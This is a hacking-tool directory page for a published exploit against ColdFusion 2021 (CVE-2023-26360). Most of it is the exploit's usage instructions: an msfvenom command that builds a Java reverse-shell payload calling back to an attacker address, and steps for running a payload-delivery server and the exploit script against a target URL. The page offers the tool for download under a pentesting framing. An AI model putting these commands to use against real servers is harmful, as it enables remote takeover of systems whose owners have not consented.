Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-26360-RCE — Exploit for Remote Code Execution in ColdFusion 2021 (CVE-2023-26360) | Kitploit
Tools/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Exploit for Remote Code Execution in ColdFusion 2021 (CVE-2023-26360)

View Repository
19 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-26360 - Remote Code Execution on ColdFusion 2021

Sometimes, the scripts don't work at first attempt. Try a few times to make it work

How to execute

Create a payload with msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Starting server.py

  • This server will send the payload to the Coldfusion server after the initial access with cve.2023-26360.py, so it need to be initialized first.
root@kitploit:~
python3 server.py 8000
  • The argument 8000 is the port that server will be listening on.

  • It's important to notice that the line 12 configure the server ip address, so change it:

root@kitploit:~
s.bind(('192.168.56.1',port))

Run cve-2023-26360.py

  • To run the exploit, execute:
root@kitploit:~
python3 cve-2023-26360.py 8000
  • As in server.py, the argument 8000 is the port the server.py will listen on. So, it must be the same on both commands.

  • The line 8 on cve-2023-26360.py sets the ip address of server.py will listen on. It's necessary to configure it correctly.

  • The line 11 on cve-2023-26360.py sets the ip address of coldfusion server, so change it:

root@kitploit:~
url = "http://192.168.56.102:8500"

Tested on

  • ColdFusion 2021 - Windows Server 2019
Download Tool